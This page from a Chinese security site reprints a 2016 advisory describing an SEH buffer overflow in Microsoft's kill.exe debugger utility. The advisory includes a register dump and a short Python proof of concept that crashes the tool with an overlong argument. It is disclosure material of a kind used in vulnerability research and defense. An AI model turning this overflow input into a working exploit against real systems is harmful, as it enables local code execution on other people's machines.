首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC 来源：hyp3rlinx.altervista.org 作者：hyp3rlinx 发布时间：2016-07-11   ''' [+] Credits: HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt [+] ISR: ApparitionSec     Vendor: ================= www.microsoft.com     Product: ========================================= Microsoft Process Kill Utility "kill.exe" File version: 6.3.9600.17298   The Kill tool (kill.exe), a tool used to terminate a process, part of the WinDbg program.     Vulnerability Type: =================== Buffer Overflow     SEH Buffer Overflow @ about 512 bytes     Vulnerability Details: =====================   Register dump     'SEH chain of main thread Address    SE handler 001AF688   kernel32.756F489B 001AFBD8   52525252 42424242   *** CORRUPT ENTRY ***     001BF81C   41414141  AAAA 001BF820   41414141  AAAA 001BF824   41414141  AAAA 001BF828   41414141  AAAA 001BF82C   41414141  AAAA 001BF830   41414141  AAAA 001BF834   909006EB  ë  Pointer to next SEH record 001BF838   52525252  RRRR  SE handler  <================ 001BF83C   90909090 001BF840   90909090     Exploit code(s): ================   Python POC. '''   junk="A"*508+"RRRR"   pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe ' subprocess.Popen([pgm, junk], shell=False)     ''' Disclosure Timeline: ================================== Vendor Notification: June 24, 2016 Vendor reply:  Will not security service July 8, 2016  : Public Disclosure     Exploitation Technique: ======================= Local     Severity Level: ================ Low     [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.   HYP3RLINX '''   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·WordPress WP-DownloadManager P ·Microsoft WinDbg logviewer.exe ·GE Proficy HMI/SCADA CIMPLICIT ·php Real Estate Script 3 - Arb ·Core FTP LE 2.2 - Path Field L ·CyberPower Systems PowerPanel ·VUPlayer 2.49 - .m3u Buffer Ov ·Ruby On Rails ActionPack Inlin ·GNU Wget < 1.18 - Arbitrary Fi ·MS16-016 mrxdav.sys WebDav Loc ·PrinceXML Wrapper Class Comman ·Belkin Router AC1200 Firmware   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved